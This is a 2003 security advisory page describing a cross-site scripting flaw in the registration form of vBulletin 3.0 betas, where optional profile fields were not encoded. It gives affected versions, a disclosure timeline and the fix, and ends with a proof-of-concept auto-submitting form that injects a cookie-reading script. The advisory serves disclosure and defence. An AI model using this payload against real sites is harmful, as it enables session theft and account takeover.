VBulletin New Member XSS Vulnerability
06.08.2003
Okuyucu : 70.613
Günlük Okuyucu : 40,5
Okuyucu : 70.613
Günlük Okuyucu : 40,5
------------------------------------------------------ VBulletin New Member XSS Vulnerability ------------------------------------------------------ Any kind of XSS attacks possibility. With this vuln. an attacker could access other users/admins accounts. Online URL : http://ferruh.mavituna.com/article.asp?256 ------------------------------------------------------ About VBulletin; ------------------------------------------------------ PHP Based Popular Forum Application Vendor & Demo; www.vbulletin.com ------------------------------------------------------ Description; ------------------------------------------------------ In new member page (register.php), If you skip a required field system redirect you same form and fill fields automaticly that you enter before for a better form. In standard fields Vbulletin successfully handle script injections. But in optional fields like "Interests-Hobbies", "Biography", "Occupation" etc... So you can execute any JS with these fields. ------------------------------------------------------ Vulnerable; ------------------------------------------------------ vBulletin 3.0 Beta 2 <> Beta 7 ------------------------------------------------------ Non Vulnerable; ------------------------------------------------------ vBulletin 3.0 Gamma vBulletin 2.3.0 vBulletin 2.2.8 ... ------------------------------------------------------ Vendor Status and Patch; ------------------------------------------------------ 26.01.2004, Problem fixed. To update vB3 Gamma or later. ------------------------------------------------------ History ------------------------------------------------------ Discovered : 15.07.2003 Vendor Informed : 29.07.2003 Publihed : 06.08.2003 ------------------------------------------------------ Solution; ------------------------------------------------------ HTML Encoding like other inputs is OK. ------------------------------------------------------ Exploit Code; ------------------------------------------------------ [form action="http://[victim]/register.php?do=register" method="post" style="display:none"] [input type="hidden" name="s" value="" /] [input type="hidden" name="regtype" value="1" /] [input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /] [input type="hidden" name="url" value="index.php" /] [input type="hidden" name="do" value="addmember" /] [/form] [script] //Code that will be executed var xss = "\"][script]alert(document"+".cookie)[\/script]"; document.forms[0].field1.value=xss; document.forms[0].submit(); [/script] *Replace ([],<>) Ferruh Mavituna http://ferruh.mavituna.com Web Application Security Specialist

Yorumlar
Yorum Ekle
Diğer Yazılar
Ve bana neden MSN kullanmıyorsun diye sordular...
Vedat Yigitoglu, Economics, Ekonomi
Verisign IDefense' i satın aldı
Victim.com
View-Source[fm] - Bookmarklet
Vikipedi
Visa cuts CardSystems over security breach
Visio ve Office XML Şemaları
Visionic Pc-188 Webcam
Vista Compatibility Files
Vista' da Güvenli Kod Yazmak
Vista Saygıda Kusur Ediyor
Vista TCP/IP Limitlerini ve HIzlı Port Tarayıcılar
Vista ve User Account Control - Protected Mode
Visual Basic 2005 - A Developer's Notebook (Developer's Notebook)
Visual Basic 2008 !
Visual Basic Filmleri
Visual Basic Scripting ile Header Bilgileri Alma
Visual Basic ve Genel Dillerde Boolean Atraksiyonları
Neredeyim ?
Ferruh.Mavituna » Advisories » VBulletin New Member XSS Vulnerability